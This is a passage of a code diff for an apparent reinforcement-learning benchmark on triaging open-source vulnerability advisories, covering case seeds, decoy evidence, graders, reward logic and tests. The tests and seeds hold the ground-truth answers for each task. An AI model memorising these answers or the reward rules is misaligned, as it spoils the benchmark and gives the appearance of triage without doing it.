            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2024-220",
            "details": (
                "Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
                "Authenticated users can upload HTML, JavaScript, or SVG files containing "
                "malicious scripts that execute in other users' browsers. This advisory was "
                "filed before a patched release was available. No fixed version is listed."
            ),
            "aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
            "references": [
                {"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
            ],
            "affected": [
                {
                    "package": {"name": "gradio", "ecosystem": "PyPI"},
                    "ranges": [
                        # No "fixed" event — all versions affected, no patch yet
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
                    ],
                }
            ],
            "cvss_vector": "Not yet available",
            # No NVD entry yet — too recent
            "nvd_description": "",
            # No EPSS data — CVE too new for scoring
            "epss_score": 0.0,
            "epss_percentile": 0.0,
        },
    ),
    "task_medium_requests": RuntimeCaseSeed(
        task_id="task_medium_requests",
        difficulty="medium",
        title="Requests Authorization Header Leak",
        objective="Resolve affected versions, weigh a conflicting exploitability signal, and inspect code diffs to determine if headers are properly stripped on redirects.",
        max_steps=14,
        osv_id="PYSEC-2018-32",
        next_action="publish_advisory",
        truth_override={
            "validity": "valid",
            "affected_package": "requests",
            "affected_versions": "<2.20.0",
            "severity": "medium",
            "exploitability": "medium",
            "next_action": "publish_advisory",
            "missing_information": [],
            "supporting_evidence_ids": [
                "osv_advisory",
                "affected_versions",
                "nvd_assessment",
                "github_commit_diff",
            ],
        },
        extra_evidence=[
            {
                "evidence_id": "github_commit_diff",
                "title": "GitHub Commit 0f78d3c",
                "kind": "reference",
                "summary": (
                    "```diff\n"
                    "@@ -101,3 +101,3 @@\n"
                    "  def rebuild_auth(self, prepared_request, response):\n"
                    "+     url = urlparse(response.url)\n"
                    "+     if url.hostname != prepared_request.url.hostname:\n"
                    "+         prepared_request.headers.pop('Authorization', None)\n"
                    "```"
                )
            },
            {
                "evidence_id": "decoy_threat_intel_aiohttp",
                "title": "Threat Intel: aiohttp",
                "kind": "exploitability",
                "summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package)."
            }
        ],
        fallback_snapshot={
            "id": "PYSEC-2018-32",
            "summary": "Header leakage in redirects",
            "details": (
                "When sending requests with an Authorization header, if the server redirects to a different "
                "host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
            ),
            "aliases": ["CVE-2018-18074"],
            "references": [],
            "affected": [
                {
                    "package": {"name": "requests", "ecosystem": "PyPI"},
                    "ranges": [
                        {"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
                    ]
                }
            ],
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
            "epss_score": 0.00512,
            "epss_percentile": 0.612,
        },
    ),
}


TASK_ORDER = list(SEEDS.keys())
DIFFICULTY_ORDER = ["easy", "medium", "hard"]


@lru_cache(maxsize=16)
def get_case_definition(task_id: str) -> CaseDefinition:
    seed = SEEDS[task_id]
    try:
        snapshot = _fetch_live_snapshot(seed)
    except Exception:
        snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
    return _build_case(seed, snapshot)


CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
    task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
}


BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
    difficulty: [
        task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
    ]
    for difficulty in DIFFICULTY_ORDER
}


def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
    """Choose a benchmark task with balanced random difficulty sampling.

    If a seed is provided, selection is deterministic from that seed.
    Otherwise, sampling uses the environment RNG state.
    """

    chooser = random.Random(seed) if seed is not None else rng
    difficulty = chooser.choice(DIFFICULTY_ORDER)
    bucket = BENCHMARK_TASKS_BY_DIFFICULTY[difficulty]
    return chooser.choice(bucket)
server/graders.py
ADDED
@@ -0,0 +1,121 @@
"""Deterministic graders for the vulnerability triage benchmark."""

from __future__ import annotations

import re
from typing import Dict, Iterable, List

try:
    from ..models import TriageDraft
    from .cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
except ImportError:
    from models import TriageDraft
    from server.cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition


WEIGHTS: Dict[str, float] = {
    "validity": 0.20,
    "affected_package": 0.10,
    "affected_versions": 0.10,
    "severity": 0.20,
    "exploitability": 0.15,
    "next_action": 0.15,
    "missing_information": 0.10,
}


def normalize_text(value: str) -> str:
    return " ".join(value.strip().lower().split())


def normalize_list(values: Iterable[str]) -> List[str]:
    return sorted({normalize_text(value) for value in values if normalize_text(value)})


def set_similarity(actual: Iterable[str], expected: Iterable[str]) -> float:
    actual_set = set(normalize_list(actual))
    expected_set = set(normalize_list(expected))
    if not actual_set and not expected_set:
        return 1.0
    if not actual_set or not expected_set:
        return 0.0
    union = actual_set | expected_set
    return len(actual_set & expected_set) / len(union)


def field_match(actual: str, expected: str) -> float:
    return 1.0 if normalize_text(actual) == normalize_text(expected) else 0.0


def _normalize_version_range(value: str) -> str:
    """Canonicalize a version range string for flexible comparison.

    Two representations that are treated as equivalent:
    - A trivial lower bound ``>=0`` / ``>=0.0`` / ``>=0.0.0`` followed by a
      comma is stripped, so ``>=0,<0.1.5`` compares equal to ``<0.1.5``.
    - Semicolon-separated multi-branch segments are sorted so submission
      order does not matter.
    """
    text = normalize_text(value)
    segments = [seg.strip() for seg in text.split(";") if seg.strip()]
    normalized: List[str] = []
    for seg in segments:
        # Remove trivial lower-bound prefix: >=0, >=0.0, >=0.0.0 before comma
        seg = re.sub(r">=\s*0(?:\.0)*\s*,\s*", "", seg)
        # Collapse whitespace around comparison operators
        seg = re.sub(r"\s*([><=!]+)\s*", r"\1", seg).strip()
        if seg:
            normalized.append(seg)
    return " ; ".join(sorted(normalized))


def version_range_match(actual: str, expected: str) -> float:
    """Score 1.0 when version ranges are semantically equivalent."""
    return (
        1.0
        if _normalize_version_range(actual) == _normalize_version_range(expected)
        else 0.0
    )


def grade_case(case: CaseDefinition, draft: TriageDraft) -> Dict[str, float]:
    breakdown = {
        "validity": field_match(draft.validity, case.truth.validity),
        "affected_package": field_match(
            draft.affected_package, case.truth.affected_package
        ),
        "affected_versions": version_range_match(
            draft.affected_versions, case.truth.affected_versions
        ),
        "severity": field_match(draft.severity, case.truth.severity),
        "exploitability": field_match(
            draft.exploitability, case.truth.exploitability
        ),
        "next_action": field_match(draft.next_action, case.truth.next_action),
        "missing_information": set_similarity(
            draft.missing_information, case.truth.missing_information
        ),
    }
    breakdown["total"] = round(
        sum(breakdown[name] * WEIGHTS[name] for name in WEIGHTS), 4
    )

    # Cascading difficulty penalties
    difficulty = getattr(case, "difficulty", "hard")

    # HARD penalty: if the truth action is request_info (meaning a patch is missing)
    # and the model tries to publish an advisory or patch, it's a critical logic failure.
    if difficulty == "hard" and case.truth.next_action == "request_info" and draft.next_action in {"publish_advisory", "patch"}:
        breakdown["total"] = round(breakdown["total"] * 0.5, 4)

    # MEDIUM penalty: medium tasks specifically test the ability to decode
    # raw intelligence (code diffs, conflicting EPSS/honeypot numbers) against decoys.
    # If a model fails to extract both severity and exploitability accurately, it failed the core challenge.
    elif difficulty == "medium" and breakdown["severity"] == 0.0 and breakdown["exploitability"] == 0.0:
        breakdown["total"] = round(breakdown["total"] * 0.75, 4)

    return breakdown


def grade_task(task_id: str, draft: TriageDraft) -> Dict[str, float]:
    return grade_case(get_case_definition(task_id), draft)
server/requirements.txt
ADDED
@@ -0,0 +1 @@
openenv-core[core]>=0.2.3
server/vuln_triage_env_environment.py
ADDED
@@ -0,0 +1,315 @@
"""OpenEnv environment implementation for vulnerability triage."""

from __future__ import annotations

import random
from typing import Dict, List, Optional
from uuid import uuid4

from openenv.core.env_server.interfaces import Environment

try:
    from ..models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
    from .cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
    from .graders import grade_case, normalize_text
except ImportError:
    from models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
    from server.cases import CASE_DEFINITIONS, SEEDS, TASK_ORDER, CaseDefinition, choose_balanced_task_id, get_case_definition
    from server.graders import grade_case, normalize_text


FIELD_TO_ATTR = {
    "set_validity": "validity",
    "set_affected_package": "affected_package",
    "set_affected_versions": "affected_versions",
    "set_severity": "severity",
    "set_exploitability": "exploitability",
    "set_next_action": "next_action",
}


class VulnTriageEnvironment(Environment):
    """Deterministic multi-step environment for OSS vulnerability triage."""

    SUPPORTS_CONCURRENT_SESSIONS: bool = True

    def __init__(self):
        self._case: CaseDefinition = CASE_DEFINITIONS[TASK_ORDER[0]]
        self._rng = random.Random(0)
        self._revealed_evidence_ids: List[str] = []
        self._draft = TriageDraft()
        self._action_history: List[str] = []
        self._submitted = False
        self._score_breakdown: Dict[str, float] = {}
        self._state = VulnTriageState(
            episode_id=str(uuid4()),
            step_count=0,
            task_id=self._case.task_id,
            difficulty=self._case.difficulty,
            draft=self._draft,
            revealed_evidence_ids=[],
            action_history=[],
            steps_remaining=self._case.max_steps,
            submitted=False,
            final_score=None,
            score_breakdown={},
        )

    def reset(
        self,
        seed: Optional[int] = None,
        episode_id: Optional[str] = None,
        task_id: Optional[str] = None,
        **_: object,
    ) -> VulnTriageObservation:
        if task_id:
            self._case = get_case_definition(task_id)
        else:
            selected_task_id = choose_balanced_task_id(seed, self._rng)
            self._case = get_case_definition(selected_task_id)

        self._revealed_evidence_ids = []
        self._draft = TriageDraft()
        self._action_history = []
        self._submitted = False
        self._score_breakdown = grade_case(self._case, self._draft)
        self._state = VulnTriageState(
            episode_id=episode_id or str(uuid4()),
            step_count=0,
            task_id=self._case.task_id,
            difficulty=self._case.difficulty,
            draft=self._draft.model_copy(deep=True),
            revealed_evidence_ids=[],
            action_history=[],
            steps_remaining=self._case.max_steps,
            submitted=False,
            final_score=None,
            score_breakdown=self._score_breakdown,
        )
        return self._observation(reward=0.0)

    def step(
        self,
        action: VulnTriageAction,
        timeout_s: Optional[float] = None,
        **_: object,
    ) -> VulnTriageObservation:
        del timeout_s
        if self._submitted:
            return self._observation(
                reward=-0.05,
                done=True,
                metadata={"error": "episode_already_submitted"},
            )

        self._state.step_count += 1
        reward = -0.005
        note = action.action_type

        if action.action_type == "read_report":
            reward += 0.03 if not any(h.startswith("read_report") for h in self._action_history) else -0.02
            note = "read_report"
        elif action.action_type == "search_nvd_database":
            reward += self._handle_nvd_search(action)
            note = f"search_nvd_database:{action.value or ''}"
        elif action.action_type == "fetch_commit_diff":
            reward += self._handle_commit_fetch(action)
            note = f"fetch_commit_diff:{action.value or ''}"
        elif action.action_type == "message_maintainer":
            reward += self._handle_message_maintainer(action)
            note = f"message_maintainer:{action.value or ''}"
        elif action.action_type == "inspect_evidence":
            reward += self._handle_inspect(action)
            note = f"inspect_evidence:{action.evidence_id or ''}"
        elif action.action_type in FIELD_TO_ATTR:
            reward += self._handle_field_update(action)
            note = f"{action.action_type}:{action.value or ''}"
        elif action.action_type in {"set_missing_information", "request_more_info"}:
            reward += self._handle_missing_info(action)
            note = f"{action.action_type}:{action.value or ''}"
        elif action.action_type == "submit_triage":
            return self._handle_submit(action)
        else:
            reward -= 0.05
            note = f"invalid_action:{action.action_type}"

        self._action_history.append(note)
        self._score_breakdown = grade_case(self._case, self._draft)
        self._sync_state()

        if self._state.steps_remaining == 0:
            timeout_penalty = max(self._score_breakdown["total"] - 0.1, 0.0)
            self._submitted = True
            self._state.submitted = True
            self._state.final_score = round(timeout_penalty, 4)
            return self._observation(
                reward=round(timeout_penalty, 4),
                done=True,
                final_score=round(timeout_penalty, 4),
                metadata={"termination_reason": "step_budget_exhausted"},
            )

        return self._observation(reward=round(reward, 4))

    def _handle_nvd_search(self, action: VulnTriageAction) -> float:
        query = (action.value or "").strip().lower()
        if not query:
            return -0.05
        # The query must match one of the aliases in the seed fallback to reveal the nvd_assessment
        seed = SEEDS[self._case.task_id]
        snapshot_aliases = [normalize_text(a) for a in seed.fallback_snapshot.get("aliases", [])]

        # We assume nvd_assessment holds the real data. If the agent searched a decoy CVE, we would
        # conceptually return the decoy data; for simplicity, we only check against the real CVE.
        if normalize_text(query) in snapshot_aliases or query == normalize_text(seed.osv_id):
            if "nvd_assessment" not in self._revealed_evidence_ids:
                self._revealed_evidence_ids.append("nvd_assessment")
            return 0.08
        return -0.04

    def _handle_commit_fetch(self, action: VulnTriageAction) -> float:
        query = (action.value or "").strip()
        if not query:
            return -0.05
        # If there's a github_commit_diff evidence piece, check whether the query appears in the title "GitHub Commit <hash>"
        for item in self._case.evidence:
            if item["evidence_id"] == "github_commit_diff":
                if query.lower() in item["title"].lower():
                    if "github_commit_diff" not in self._revealed_evidence_ids:
                        self._revealed_evidence_ids.append("github_commit_diff")
                    return 0.08
        return -0.04

    def _handle_message_maintainer(self, action: VulnTriageAction) -> float:
        msg = (action.value or "").strip()
        if len(msg) < 5:
            return -0.05  # Need a real message

        # Messaging the maintainer reveals the vendor_status evidence if it exists
        has_vendor_evidence = False
        for item in self._case.evidence:
            if item["evidence_id"] == "vendor_status":
                if "vendor_status" not in self._revealed_evidence_ids:
                    self._revealed_evidence_ids.append("vendor_status")
                has_vendor_evidence = True
                break

        return 0.08 if has_vendor_evidence else -0.02

    def _handle_inspect(self, action: VulnTriageAction) -> float:
        evidence_id = action.evidence_id or ""
        all_ids = {item["evidence_id"] for item in self._case.evidence}
        if evidence_id not in all_ids:
            return -0.06

        # Trap: the model cannot inspect interactive evidence directly as if it were static JSON
        if evidence_id in {"nvd_assessment", "github_commit_diff", "vendor_status"}:
            return -0.05

        if evidence_id in self._revealed_evidence_ids:
            return -0.02

        self._revealed_evidence_ids.append(evidence_id)
        if evidence_id in self._case.truth.supporting_evidence_ids:
            return 0.06
        return 0.02

    def _handle_field_update(self, action: VulnTriageAction) -> float:
        attr = FIELD_TO_ATTR[action.action_type]
        new_value = (action.value or "").strip()
        if not new_value:
            return -0.04

        current_value = getattr(self._draft, attr)
        if normalize_text(current_value) == normalize_text(new_value):
            return -0.01

        setattr(self._draft, attr, new_value)
        expected_value = getattr(self._case.truth, attr)
        if normalize_text(new_value) == normalize_text(expected_value):
            return 0.08
        return -0.03

    def _handle_missing_info(self, action: VulnTriageAction) -> float:
        value = (action.value or "").strip()
        if not value:
            return -0.04

        normalized_existing = {normalize_text(item) for item in self._draft.missing_information}
        if normalize_text(value) not in normalized_existing:
            self._draft.missing_information.append(value)

        required = {normalize_text(item) for item in self._case.truth.missing_information}
        if normalize_text(value) in required:
            return 0.06
        if action.action_type == "request_more_info" and self._case.truth.next_action == "request_info":
            return 0.02
        return -0.02

    def _handle_submit(self, action: VulnTriageAction) -> VulnTriageObservation:
        del action
        self._submitted = True
        breakdown = grade_case(self._case, self._draft)
        final_score = breakdown["total"]
        if len(self._revealed_evidence_ids) < max(2, len(self._case.truth.supporting_evidence_ids) // 2):
            final_score = max(0.0, round(final_score - 0.1, 4))

        self._action_history.append("submit_triage")
        self._score_breakdown = {**breakdown, "total": final_score}
        self._state.submitted = True
        self._state.final_score = final_score
        self._sync_state()
        return self._observation(
            reward=final_score,
            done=True,
            final_score=final_score,
            metadata={"termination_reason": "submitted"},
        )

    def _sync_state(self) -> None:
        self._state.task_id = self._case.task_id
        self._state.difficulty = self._case.difficulty
        self._state.draft = self._draft.model_copy(deep=True)
        self._state.revealed_evidence_ids = list(self._revealed_evidence_ids)
        self._state.action_history = list(self._action_history)
        self._state.steps_remaining = max(self._case.max_steps - self._state.step_count, 0)
        self._state.score_breakdown = dict(self._score_breakdown)

    def _observation(
        self,
        reward: float,
        done: bool = False,
        final_score: Optional[float] = None,
        metadata: Optional[Dict[str, object]] = None,
    ) -> VulnTriageObservation:
        self._sync_state()
        visible_evidence = [
            EvidenceItem.model_validate(item)
            for item in self._case.evidence
            if item["evidence_id"] in self._revealed_evidence_ids
        ]
        return VulnTriageObservation(
            task_id=self._case.task_id,
            difficulty=self._case.difficulty,
            objective=self._case.objective,
            report_summary=self._case.report_summary,
            visible_evidence=visible_evidence,
            available_evidence=[
                item["evidence_id"]
                for item in self._case.evidence
                if item["evidence_id"] not in self._revealed_evidence_ids
            ],
            draft=self._draft.model_copy(deep=True),
            action_history=list(self._action_history),
            steps_remaining=max(self._case.max_steps - self._state.step_count, 0),
            score_breakdown=dict(self._score_breakdown),
            final_score=final_score,
            done=done,
            reward=reward,
            metadata=metadata or {},
        )

    @property
    def state(self) -> VulnTriageState:
        self._sync_state()
        return self._state
tests/test_environment.py
ADDED
@@ -0,0 +1,220 @@
| 1 |
+
import random
|
| 2 |
+
|
| 3 |
+
from models import TriageDraft, VulnTriageAction
|
| 4 |
+
from server.cases import choose_balanced_task_id, CASE_DEFINITIONS
|
| 5 |
+
from server.graders import grade_task, version_range_match
|
| 6 |
+
from server.vuln_triage_env_environment import VulnTriageEnvironment
|
| 7 |
+
|
| 8 |
+
|
| 9 |
+
# ---------------------------------------------------------------------------
|
| 10 |
+
# Core environment tests
|
| 11 |
+
# ---------------------------------------------------------------------------
|
| 12 |
+
|
| 13 |
+
def test_easy_task_can_be_solved_deterministically():
|
| 14 |
+
"""Easy task should be solvable in 10 steps with just 2 evidence reads."""
|
| 15 |
+
env = VulnTriageEnvironment()
|
| 16 |
+
env.reset(task_id="task_easy_guarddog")
|
| 17 |
+
env.step(VulnTriageAction(action_type="read_report"))
|
| 18 |
+
env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="osv_advisory"))
|
| 19 |
+
env.step(VulnTriageAction(action_type="inspect_evidence", evidence_id="affected_versions"))
|
| 20 |
+
env.step(VulnTriageAction(action_type="set_validity", value="valid"))
|
| 21 |
+
env.step(VulnTriageAction(action_type="set_affected_package", value="guarddog"))
|
| 22 |
+
env.step(VulnTriageAction(action_type="set_affected_versions", value="<0.1.5"))
|
| 23 |
+
env.step(VulnTriageAction(action_type="set_severity", value="medium"))
|
| 24 |
+
env.step(VulnTriageAction(action_type="set_exploitability", value="low"))
|
| 25 |
+
env.step(VulnTriageAction(action_type="set_next_action", value="patch"))
|
| 26 |
+
result = env.step(VulnTriageAction(action_type="submit_triage"))
|
| 27 |
+
assert result.done is True
|
| 28 |
+
assert result.final_score == 1.0
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def test_medium_task_uses_real_provider_backed_truth():
|
| 32 |
+
env = VulnTriageEnvironment()
|
| 33 |
+
env.reset(task_id="task_medium_invenio")
|
| 34 |
+
env.step(VulnTriageAction(action_type="set_validity", value="valid"))
|
| 35 |
+
env.step(VulnTriageAction(action_type="set_affected_package", value="invenio-records"))
|
| 36 |
+
breakdown = grade_task("task_medium_invenio", env.state.draft)
|
| 37 |
+
assert breakdown["validity"] == 1.0
|
| 38 |
+
assert breakdown["affected_package"] == 1.0
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
def test_balanced_sampler_is_seed_reproducible():
|
| 42 |
+
first = choose_balanced_task_id(7, random.Random(0))
|
| 43 |
+
second = choose_balanced_task_id(7, random.Random(999))
|
| 44 |
+
assert first == second
|
| 45 |
+
|
| 46 |
+
|
| 47 |
+
def test_environment_reset_without_task_id_samples_valid_difficulties():
|
| 48 |
+
env = VulnTriageEnvironment()
|
| 49 |
+
seen = {env.reset().difficulty for _ in range(12)}
|
| 50 |
+
assert seen == {"easy", "medium", "hard"}
|
| 51 |
+
|
| 52 |
+
|
# ---------------------------------------------------------------------------
# Fix 1: version range normalizer accepts equivalent expressions
# ---------------------------------------------------------------------------

def test_version_range_match_accepts_trivial_lower_bound():
    assert version_range_match(">=0,<0.1.5", "<0.1.5") == 1.0
    assert version_range_match(">=0.0.0,<0.1.5", "<0.1.5") == 1.0


def test_version_range_match_is_order_insensitive_for_segments():
    a = "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2"
    b = ">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2"
    assert version_range_match(a, b) == 1.0


def test_version_range_match_different_ranges_score_zero():
    assert version_range_match("<0.1.4", "<0.1.5") == 0.0
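
These three tests imply a specific normalization contract: trivial lower bounds such as ">=0" are dropped, ";"-separated segments are compared as a set, and anything else must match exactly. The sketch below is one plausible reading of server/graders.py, not a copy of it; `normalize_range` and `version_range_match_sketch` are names invented here.

# Hedged sketch of the normalization the tests above imply.
TRIVIAL_LOWER_BOUNDS = {">=0", ">=0.0.0"}

def normalize_range(expr: str) -> frozenset:
    segments = set()
    for segment in expr.split(";"):
        clauses = [c.strip() for c in segment.split(",") if c.strip()]
        # Drop no-op lower bounds so ">=0,<0.1.5" equals "<0.1.5".
        clauses = [c for c in clauses if c not in TRIVIAL_LOWER_BOUNDS]
        if clauses:
            segments.add(",".join(sorted(clauses)))
    return frozenset(segments)

def version_range_match_sketch(predicted: str, truth: str) -> float:
    # Comparing frozensets makes segment order irrelevant.
    return 1.0 if normalize_range(predicted) == normalize_range(truth) else 0.0
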
# ---------------------------------------------------------------------------
# Fix 2: multi-branch affected versions captured correctly
# ---------------------------------------------------------------------------

def test_medium_invenio_ground_truth_includes_all_branches():
    truth = CASE_DEFINITIONS["task_medium_invenio"].truth
    assert "<1.0.2" in truth.affected_versions
    assert ">=1.1.0,<1.1.1" in truth.affected_versions
    assert ">=1.2.0,<1.2.2" in truth.affected_versions


def test_medium_invenio_all_branches_score_full_points():
    draft = TriageDraft(
        validity="valid",
        affected_package="invenio-records",
        affected_versions=">=1.2.0,<1.2.2 ; >=1.1.0,<1.1.1 ; <1.0.2",
        severity="medium",
        exploitability="low",
        next_action="publish_advisory",
    )
    breakdown = grade_task("task_medium_invenio", draft)
    assert breakdown["affected_versions"] == 1.0
+
# ---------------------------------------------------------------------------
|
| 97 |
+
# Difficulty redesign — Easy task
|
| 98 |
+
# ---------------------------------------------------------------------------
|
| 99 |
+
|
| 100 |
+
def test_easy_task_only_needs_two_evidence_items():
|
| 101 |
+
"""Easy task supporting_evidence_ids should be just 2 items, not 4."""
|
| 102 |
+
truth = CASE_DEFINITIONS["task_easy_guarddog"].truth
|
| 103 |
+
assert truth.supporting_evidence_ids == ["osv_advisory", "affected_versions"]
|
| 104 |
+
assert len(truth.supporting_evidence_ids) == 2
|
| 105 |
+
|
| 106 |
+
|
| 107 |
+
def test_easy_task_max_steps_is_tight():
|
| 108 |
+
assert CASE_DEFINITIONS["task_easy_guarddog"].max_steps == 10
|
| 109 |
+
|
| 110 |
+
|
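
Read together with test_easy_task_can_be_solved_deterministically at the top of the file, the max_steps assertion is tight by construction: the scripted solution spends one step on read_report, two on evidence reads, six on field setters, and one on submit_triage. A quick illustrative tally, reusing only names already imported in this file:

# Illustrative only: the scripted easy-task walkthrough uses exactly
# the allowed step budget, leaving no slack for wasted actions.
SCRIPTED_STEPS = [
    "read_report",
    "inspect_evidence",  # osv_advisory
    "inspect_evidence",  # affected_versions
    "set_validity",
    "set_affected_package",
    "set_affected_versions",
    "set_severity",
    "set_exploitability",
    "set_next_action",
    "submit_triage",
]
assert len(SCRIPTED_STEPS) == CASE_DEFINITIONS["task_easy_guarddog"].max_steps  # 10
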
# ---------------------------------------------------------------------------
# Difficulty redesign — Medium task
# ---------------------------------------------------------------------------

def test_medium_task_has_threat_intel_evidence():
    """Medium task should inject a threat_intel_signal evidence item."""
    evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_medium_invenio"].evidence]
    assert "threat_intel_signal" in evidence_ids


def test_medium_task_exploitability_is_medium_not_low():
    """EPSS says low but threat intel overrides to medium — key difficulty driver."""
    truth = CASE_DEFINITIONS["task_medium_invenio"].truth
    assert truth.exploitability == "medium", (
        "Medium task exploitability must be 'medium' (overriding EPSS) "
        "so any model that only reads the EPSS evidence gets it wrong."
    )


def test_medium_task_exploitability_costs_points_if_epss_only():
    """A model that reads only EPSS and submits 'low' exploitability loses points."""
    draft = TriageDraft(
        validity="valid",
        affected_package="invenio-records",
        affected_versions="<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
        severity="medium",
        exploitability="low",  # wrong — EPSS-only answer
        next_action="publish_advisory",
    )
    breakdown = grade_task("task_medium_invenio", draft)
    assert breakdown["exploitability"] == 0.0
    assert breakdown["total"] < 1.0
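
The exploitability tests encode the medium task's trap: the EPSS evidence alone reads "low", but the injected threat_intel_signal raises the right answer to "medium". One plausible agent-side heuristic for combining the two signals is sketched below; it is an assumption about how a policy could behave, not code shipped in this repo.

# Hypothetical agent-side heuristic, not part of the environment.
from typing import Optional

LEVELS = ["low", "medium", "high"]  # ordered least to most exploitable

def combine_exploitability(epss_level: str, threat_intel_level: Optional[str]) -> str:
    # Take the worse (higher) of the two signals; an EPSS-only reading
    # returns "low" here and forfeits the exploitability points.
    if threat_intel_level is None:
        return epss_level
    return max(epss_level, threat_intel_level, key=LEVELS.index)

assert combine_exploitability("low", "medium") == "medium"
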
# ---------------------------------------------------------------------------
# Difficulty redesign — Hard task
# ---------------------------------------------------------------------------

def test_hard_task_correct_next_action_is_request_info():
    """Hard task must require request_info, not publish_advisory."""
    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
    assert truth.next_action == "request_info", (
        "Hard task next_action must be 'request_info' — no patch exists yet."
    )


def test_hard_task_has_vendor_status_evidence():
    """Hard task should inject a vendor_status evidence item explaining no patch."""
    evidence_ids = [e["evidence_id"] for e in CASE_DEFINITIONS["task_hard_gradio"].evidence]
    assert "vendor_status" in evidence_ids


def test_hard_task_affected_versions_covers_all():
    """Hard task affected_versions must be >=0 (no fixed version)."""
    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
    assert truth.affected_versions == ">=0"


def test_hard_task_publish_advisory_costs_next_action_points():
    """A model that naively publishes instead of requesting info loses 15%."""
    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
    draft = TriageDraft(
        validity="valid",
        affected_package="gradio",
        affected_versions=">=0",
        severity="medium",
        exploitability="low",
        next_action="publish_advisory",  # wrong — no patch exists
        missing_information=list(truth.missing_information),
    )
    breakdown = grade_task("task_hard_gradio", draft)
    assert breakdown["next_action"] == 0.0
    assert breakdown["total"] < 1.0


def test_hard_task_request_info_scores_full():
    """The correct hard-task answer should score 1.0."""
    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
    draft = TriageDraft(
        validity=truth.validity,
        affected_package=truth.affected_package,
        affected_versions=truth.affected_versions,
        severity=truth.severity,
        exploitability=truth.exploitability,
        next_action="request_info",
        missing_information=list(truth.missing_information),
    )
    breakdown = grade_task("task_hard_gradio", draft)
    assert breakdown["next_action"] == 1.0
    assert breakdown["total"] == 1.0


def test_hard_task_has_non_empty_missing_information():
    truth = CASE_DEFINITIONS["task_hard_gradio"].truth
    assert len(truth.missing_information) >= 3


def test_hard_task_empty_missing_info_costs_points():
    draft = TriageDraft(
        validity="valid",
        affected_package="gradio",
        affected_versions=">=0",
        severity="medium",
        exploitability="low",
        next_action="request_info",
        missing_information=[],
    )
    breakdown = grade_task("task_hard_gradio", draft)
    assert breakdown["missing_information"] == 0.0
    assert breakdown["total"] < 1.0
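
Taken together, these tests constrain the grading rubric without fully specifying it: the breakdown carries one entry per draft field plus a total, a wrong next_action alone costs 15% (per the docstring above), and a perfect draft sums to exactly 1.0. Below is one weighting consistent with those constraints; only the 0.15 for next_action is actually pinned down by this file, and every other number is an assumption about server/graders.py.

# Hypothetical weights; only next_action's 0.15 is implied by the tests.
FIELD_WEIGHTS = {
    "validity": 0.15,
    "affected_package": 0.15,
    "affected_versions": 0.20,
    "severity": 0.15,
    "exploitability": 0.10,
    "next_action": 0.15,
    "missing_information": 0.10,
}
assert abs(sum(FIELD_WEIGHTS.values()) - 1.0) < 1e-9

def total_score(breakdown: dict) -> float:
    # Weighted sum of per-field scores, each in [0, 1].
    return sum(FIELD_WEIGHTS[f] * breakdown.get(f, 0.0) for f in FIELD_WEIGHTS)
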
uv.lock
ADDED
The diff for this file is too large to render.
See raw diff